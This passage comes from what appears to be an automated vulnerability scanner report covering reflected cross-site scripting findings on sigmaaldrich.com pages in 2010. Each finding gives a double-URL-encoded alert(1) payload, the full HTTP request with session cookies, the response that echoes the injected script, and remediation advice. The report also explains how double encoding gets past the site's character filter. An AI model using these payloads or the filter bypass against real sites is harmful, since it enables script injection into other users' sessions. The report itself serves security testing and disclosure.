Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home/c51cf%2522%253balert%25281%2529%252f%252f43420a37288?id=1289930010680 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D; fsr.a=1289930591838

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:11 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28927


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home/c51cf";alert(1)//43420a37288","E404") ;
   </script>
...[SNIP]...

1.638. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e0a4%2522%253balert%25281%2529%252f%252ff5e71599d09 was submitted in the REST URL parameter 1. This input was echoed as 8e0a4";alert(1)//f5e71599d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home8e0a4%2522%253balert%25281%2529%252f%252ff5e71599d09/product-catalog.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?D7=0&N17=2&N16=AND(OR(CONTEXT:1,CONTEXT:3),OR(LOCATION:US,LOCATION:0))&N3=mode matchpartialmax&N5=Molecular Formula&N4=`&N1=S_ID&ST=RS&QS=ON&N25=0&F=TD
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930590653&t2=1289930590965&t3=1289930591495&t4=1289930590231&lti=1289930591495&ln=&hr=/technical-service-home/product-catalog.html&fti=&fn=SearchForm%3A0%3BtestLookahead%3A1%3BsearchResultsSearch%3A2%3BDocument%20Category%3A3%3B&ac=&fd=&uer=&fu=&pi=Search%20Result%20Page&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930590247}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:08 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28947


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home8e0a4";alert(1)//f5e71599d09/product-catalog.html","E404") ;
   </script>
...[SNIP]...

1.639. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86339%2522%253balert%25281%2529%252f%252fd6e5fce1c43 was submitted in the REST URL parameter 2. This input was echoed as 86339";alert(1)//d6e5fce1c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home/86339%2522%253balert%25281%2529%252f%252fd6e5fce1c43 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?D7=0&N17=2&N16=AND(OR(CONTEXT:1,CONTEXT:3),OR(LOCATION:US,LOCATION:0))&N3=mode matchpartialmax&N5=Molecular Formula&N4=`&N1=S_ID&ST=RS&QS=ON&N25=0&F=TD
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930590653&t2=1289930590965&t3=1289930591495&t4=1289930590231&lti=1289930591495&ln=&hr=/technical-service-home/product-catalog.html&fti=&fn=SearchForm%3A0%3BtestLookahead%3A1%3BsearchResultsSearch%3A2%3BDocument%20Category%3A3%3B&ac=&fd=&uer=&fu=&pi=Search%20Result%20Page&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930590247}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28927


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home/86339";alert(1)//d6e5fce1c43","E404") ;
   </script>
...[SNIP]...

1.640. http://www.sigmaaldrich.com/united-states.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /united-states.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f07d5%2522%253balert%25281%2529%252f%252fd86fe3897ff was submitted in the REST URL parameter 1. This input was echoed as f07d5";alert(1)//d86fe3897ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /f07d5%2522%253balert%25281%2529%252f%252fd86fe3897ff HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28904


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/f07d5";alert(1)//d86fe3897ff","E404") ;
   </script>
...[SNIP]...
